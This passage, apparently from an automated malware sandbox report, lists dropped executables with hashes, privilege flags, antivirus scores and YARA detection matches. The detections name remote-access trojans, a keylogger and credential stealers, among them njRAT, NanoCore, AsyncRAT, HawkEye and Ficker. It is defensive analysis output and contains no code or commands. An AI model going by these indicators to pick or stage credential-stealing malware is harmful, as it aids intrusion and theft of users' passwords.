                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        Reputation:low

                                                                                                        Target ID:4
                                                                                                        Start time:18:00:38
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\healastounding.exe"
                                                                                                        Imagebase:0x900000
                                                                                                        File size:3733504 bytes
                                                                                                        MD5 hash:6FB798F1090448CE26299C2B35ACF876
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Target ID:5
                                                                                                        Start time:18:00:43
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\Pluto Panel.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Pluto Panel.exe"
                                                                                                        Imagebase:0xf10000
                                                                                                        File size:913920 bytes
                                                                                                        MD5 hash:ED666BF7F4A0766FCEC0E9C8074B089B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.712461562.0000000007700000.00000004.00000001.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Arnim Rupp
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: JPCERT/CC Incident Response Group
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Target ID:6
                                                                                                        Start time:18:00:44
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\test.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\test.exe"
                                                                                                        Imagebase:0xda0000
                                                                                                        File size:46080 bytes
                                                                                                        MD5 hash:7E50B292982932190179245C60C0B59B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.701971433.0000000001354000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.703770994.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\test.exe, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\test.exe, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Target ID:7
                                                                                                        Start time:18:00:50
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:549556 bytes
                                                                                                        MD5 hash:0FD7DE5367376231A788872005D7ED4F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_ficker_stealer, Description: Yara detected Ficker Stealer, Source: 00000007.00000002.468272297.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 29%, Metadefender
                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:8
                                                                                                        Start time:18:00:51
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\gay.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\gay.exe"
                                                                                                        Imagebase:0xd0000
                                                                                                        File size:37888 bytes
                                                                                                        MD5 hash:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Target ID:9
                                                                                                        Start time:18:00:53
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Opus.exe"
                                                                                                        Imagebase:0x840000
                                                                                                        File size:208384 bytes
                                                                                                        MD5 hash:759185EE3724D7563B709C888C696959
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
